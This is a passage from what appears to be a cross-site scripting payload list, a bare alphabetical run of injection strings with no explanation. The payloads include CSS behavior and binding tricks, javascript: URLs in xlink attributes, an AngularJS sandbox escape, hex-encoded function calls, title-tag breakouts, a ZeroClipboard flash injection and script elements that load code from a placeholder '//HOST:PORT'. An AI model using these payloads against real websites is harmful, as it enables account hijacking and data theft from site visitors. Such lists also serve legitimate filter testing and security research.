- <xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:javascript:alert(1)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <x style=”background:url(‘x;color:red;/*’)”>XXX</x>
- <x style=”background:url(‘x[a];color:red;/*’)”>XXX</x>
- <x style=”background:url(‘x ;color:red;/*’)”>XXX</x>
- <x style=”behavior:url(%(sct)s)”>
- <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
- x=this[x]
- x</title><img src%3dx onerror%3dalert(1)>
- x��</title><img src%3dx onerror%3dalert(1)>
- x=’\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
- x=x=>{}/alert(1)/+alert(2)
- <x xmlns=”http://www.w3.org/2001/xml-events" event=”load” observer=”foo” handler=”data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar”/>
- <x xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:actuate=”onLoad” xlink:href=”javascript:alert(1)” xlink:type=”simple”/>
- X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
- (X=_=>`(X=${X})()`)()
- XXX<style>*[‘<! — ‘]{}</style> →{}*{color:red}</style>
- x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()
- x(x(y))
- x(y)
- {{x = {‘y’:’’.constructor.prototype}; x[‘y’].charAt=[].join;$eval(‘x=alert(1)’);}}
- xyz onerror=alert(6);
- y=<a>alert</a>;content[y](123)
- y=’nam’+$$
- y=’na’+’me’
- y=name
- y=x(y)
- ‘“()=<z>
- z=d.createElement(“script”);
- z=d.createElement(“script”);z.src=”//HOST:PORT”;
- ZeroClipboard.swf?id=\”))} catch(e) {alert(1);}//&width=1000&height=1000
- z.src=”//HOST:PORT”;